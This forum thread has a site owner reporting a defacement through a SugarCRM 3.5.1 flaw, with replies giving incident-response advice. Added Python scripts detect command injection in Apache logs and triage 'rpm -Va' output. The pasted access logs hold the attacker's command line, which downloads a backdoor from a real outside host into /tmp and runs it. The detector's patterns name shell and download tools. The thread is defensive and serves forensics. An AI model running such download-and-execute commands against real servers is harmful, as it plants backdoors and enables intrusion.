
Thread: site defaced!

#1 mrshark (Junior Member)

site defaced!

    my company site was defaced tonight, using a bug in sugarcrm 3.5.1, as the following logs say:

    Code:
    [root@www ~]# find /var/log/httpd/ -print | xargs grep r0nin
    /var/log/httpd/error_log:--21:56:53--  http://www.illusor.altervista.org/r0nin
    /var/log/httpd/error_log:           => `r0nin'
    /var/log/httpd/error_log:21:56:54 (50.00 KB/s) - `r0nin' saved [19242/19242]
    /var/log/httpd/error_log:sh: ./r0nin: Permission denied
    /var/log/httpd/error_log:--21:57:43--  http://www.illusor.altervista.org/r0nin
    /var/log/httpd/error_log:           => `r0nin.1'
    /var/log/httpd/error_log:21:57:44 (49.18 KB/s) - `r0nin.1' saved [19242/19242]
    /var/log/httpd/error_log:--21:58:23--  http://www.illusor.altervista.org/r0nin
    /var/log/httpd/error_log:           => `r0nin.2'
    /var/log/httpd/error_log:21:58:23 (49.29 KB/s) - `r0nin.2' saved [19242/19242]
    /var/log/httpd/access_log:87.6.123.196 - - [12/Dec/2005:21:56:53 +0100] "GET /crm35/pointslash.php?cmd=cd%20/tmp;wget%20http://www.illusor.altervista.org/r0nin;chmod%20777;./r0nin HTTP/1.0" 200 - "-" "Vagabondo/2.0 MT"
    /var/log/httpd/access_log:87.6.123.196 - - [12/Dec/2005:21:57:43 +0100] "GET /crm35/pointslash.php?cmd=cd%20/tmp;wget%20http://www.illusor.altervista.org/r0nin;chmod%20777 HTTP/1.0" 200 - "-" "Vagabondo/2.0 MT"
    /var/log/httpd/access_log:87.6.123.196 - - [12/Dec/2005:21:58:23 +0100] "GET /crm35/pointslash.php?cmd=cd%20/tmp;wget%20http://www.illusor.altervista.org/r0nin;chmod%20777%20r0nin;./r0nin HTTP/1.0" 200 52 "-" "Vagabondo/2.0 MT"
Any help? I think they used this: http://www.milw0rm.com/id.php?id=1364
    Last edited by mrshark; 2005-12-13 at 07:47 AM.
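The access_log entries above are the whole story of the intrusion: a query-string parameter carried a shell command line, and the web server ran it. As an added example, not part of the original thread or of SugarCRM, here is a small detector that parses Apache access-log lines, decodes each query parameter, and reports values that combine shell metacharacters with download or execution keywords. The sample log is constructed to mirror the thread's entries; the client IPs and the download host in it are documentation placeholders, not the real ones.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Constructed sample lines modelled on the thread's access_log entries.
# The IP addresses and the download host are documentation placeholders, not the real ones.
SAMPLE_ACCESS_LOG = """\
198.51.100.7 - - [12/Dec/2005:21:56:53 +0100] "GET /crm35/pointslash.php?cmd=cd%20/tmp;wget%20http://dropsite.example/r0nin;chmod%20777;./r0nin HTTP/1.0" 200 - "-" "Vagabondo/2.0 MT"
198.51.100.7 - - [12/Dec/2005:21:58:23 +0100] "GET /crm35/pointslash.php?cmd=cd%20/tmp;wget%20http://dropsite.example/r0nin;chmod%20777%20r0nin;./r0nin HTTP/1.0" 200 52 "-" "Vagabondo/2.0 MT"
192.0.2.10 - - [12/Dec/2005:22:01:11 +0100] "GET /crm35/index.php?module=Contacts&action=index HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
192.0.2.11 - - [12/Dec/2005:22:02:40 +0100] "GET /crm35/index.php?action=DetailView&record=12;34 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Apache common/combined log format: client, identd, user, timestamp, request line, status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Two independent signals; a value is flagged only when both are present, which keeps
# ordinary separators inside data (a record id like "12;34") from raising an alert.
SHELL_META = re.compile(r'[;|`]|&&|\$\(')
SHELL_WORDS = re.compile(r'\b(?:wget|curl|chmod|sh|bash|perl|nc)\b|\./|/tmp\b')


def decode_params(target):
    """Split the request target's query string into decoded name -> [values].

    Done by hand instead of urllib's parse_qs: older parse_qs versions also split on ';',
    which would cut 'cd /tmp;wget ...' into harmless-looking fragments.
    """
    params = {}
    for pair in urlsplit(target).query.split('&'):
        if not pair:
            continue
        name, _, value = pair.partition('=')
        params.setdefault(unquote(name), []).append(unquote_plus(value))
    return params


def scan_line(line):
    """Return a finding dict for one log line, or None if nothing looks like injection."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    for name, values in decode_params(m['target']).items():
        for value in values:
            has_meta = SHELL_META.search(value) is not None
            words = [w.group(0) for w in SHELL_WORDS.finditer(value)]
            if has_meta and words:
                findings.append({'param': name, 'value': value, 'indicators': words})
    if not findings:
        return None
    return {
        'ip': m['ip'],
        'time': m['ts'],
        'path': urlsplit(m['target']).path,
        'status': m['status'],
        'findings': findings,
    }


def scan_log(text):
    """Scan every line of an access log and return the hits in file order."""
    return [hit for hit in map(scan_line, text.splitlines()) if hit]


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_ACCESS_LOG):
        print(hit['time'], hit['ip'], hit['path'])
        for f in hit['findings']:
            print('   ', f['param'], '=', f['value'], '->', ', '.join(f['indicators']))
```

Run it over a real log with `scan_log(open('/var/log/httpd/access_log').read())`. The two-signal rule is deliberate: a lone `;` in a record id is not flagged, while `cd /tmp;wget ...` is, and the `chmod`/`./` indicators make the download-then-execute pattern visible even when the requested file name changes. Because the access log only records the request, pair its hits with the error_log (where the `wget` output and the `sh: ./r0nin: Permission denied` line landed) to see what actually ran.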

#2 alsutton (Sugar Community Member)

Re: site defaced!

Can you confirm the following:

    1) That you applied the 3.5.1e patch which came out a few days ago?
2) That you have in your access logs something like:

    GET /crm35/acceptDecline.php?beanFiles[1]=/crm35/&beanList[1]=1&module=1

3) You've reported the break-in to the ISP for the IP address accessing pointslash.php (they are Telecom Italia Net; the email is probably abuse@telecomitalia.it)

    Thanks,

    Al.
    Al Sutton
    Argosy TelCrest
    www.argosytelcrest.com

#3 alsutton (Sugar Community Member)

Re: site defaced!

    I've just done a quick scan of the binary they downloaded and it's a backdoor program. You SHOULD look at the following thread to read about the implications of the back door and how to verify it's not doing anything nasty to your system...

    http://forums.ev1servers.net/showthr...threadid=37871
    Al Sutton
    Argosy TelCrest
    www.argosytelcrest.com

#4 mrshark (Junior Member)

Re: site defaced!

1) No, I applied the 3.5.1e patch only now...
2) The only part in my logs that refers to the intrusion is the one I posted.
3) I used chkrootkit and rkhunter after removing all instances of the rootkit, and they didn't find anything.
4) I changed all the passwords, for security...
5) I do a yum update every day.
6) Now I closed the outgoing port 80, so it cannot download anything (I open it only briefly, to do yum update).
7) I also ran rpm -Va, to test for changed files.
Thanks a lot to all of you...
    Last edited by mrshark; 2005-12-13 at 01:56 PM.
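Step 7 of the checklist above, `rpm -Va`, prints one line per file whose recorded attributes differ from the package database, and on a busy server that list is long. As an added example, not code from the thread or from the rpm project, here is a triage script that parses that output and keeps only the entries worth a manual look: size, digest, mode or ownership changes on files that are not config, documentation or ghost files, and the mtime-only noise dropped. The sample output is constructed to show the format; the paths and flags in it are illustrative, not a real host's results. One caveat the post does not mention: `rpm -Va` trusts the local RPM database, which an intruder with root could also have altered, so a clean result from this check is reassuring but not proof.

```python
# Constructed sample of `rpm -Va` output (the format, not any real host's result).
# Columns: verify flags (S size, M mode, 5 digest, D device, L symlink, U user, G group,
# T mtime, P capabilities; '.' = unchanged, 'missing' = file gone), an optional attribute
# letter (c config, d doc, g ghost, l license, r readme), then the path.
SAMPLE_RPM_VA = """\
S.5....T.    /usr/bin/ls
.......T.  c /etc/httpd/conf/httpd.conf
S.5....T.  c /etc/ssh/sshd_config
..5....T.    /usr/sbin/sshd
.M.......    /usr/bin/passwd
missing    d /usr/share/doc/README
.......T.    /usr/lib/libfoo.so
"""

VERIFY_FLAGS = {
    'S': 'size', 'M': 'mode', '5': 'digest', 'D': 'device', 'L': 'symlink',
    'U': 'owner', 'G': 'group', 'T': 'mtime', 'P': 'capabilities',
}
FILE_ATTRS = {'c': 'config', 'd': 'doc', 'g': 'ghost', 'l': 'license', 'r': 'readme', 'a': 'artifact'}

# Attribute classes whose changes are expected (edited configs, pruned docs, runtime-created ghosts).
EXPECTED_ATTRS = {'config', 'doc', 'ghost', 'license', 'readme'}
# Changes that point at content or permission tampering rather than a touched timestamp.
STRONG_CHANGES = {'size', 'digest', 'mode', 'owner', 'group', 'symlink', 'missing'}


def parse_rpm_va(text):
    """Turn rpm -Va output into dicts: {'path', 'attr', 'changed'}.

    Splits on whitespace, so a path containing spaces would be truncated; those are rare
    in packaged files and can be post-filtered if they matter.
    """
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        flags, rest = parts[0], parts[1:]
        attr = None
        if len(rest) == 2 and rest[0] in FILE_ATTRS:
            attr = FILE_ATTRS[rest[0]]
        path = rest[-1]
        if flags == 'missing':
            changed = {'missing'}
        else:
            changed = {VERIFY_FLAGS[c] for c in flags if c in VERIFY_FLAGS}
        entries.append({'path': path, 'attr': attr, 'changed': changed})
    return entries


def triage(entries):
    """Keep entries with a strong change on a file whose class is not expected to drift."""
    return [
        e for e in entries
        if e['attr'] not in EXPECTED_ATTRS and e['changed'] & STRONG_CHANGES
    ]


def suspicious_paths(text):
    """Convenience wrapper: rpm -Va text in, list of paths to inspect out."""
    return [e['path'] for e in triage(parse_rpm_va(text))]


if __name__ == '__main__':
    for e in triage(parse_rpm_va(SAMPLE_RPM_VA)):
        print(e['path'], sorted(e['changed']))
```

Feed it real output with `suspicious_paths(open('rpm-va.txt').read())` after `rpm -Va > rpm-va.txt`. Edited config files such as sshd_config are dropped on purpose, but they still deserve a diff against the package's pristine copy once the binaries are accounted for; the script's job is only to put the handful of altered binaries and libraries at the top of the pile.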
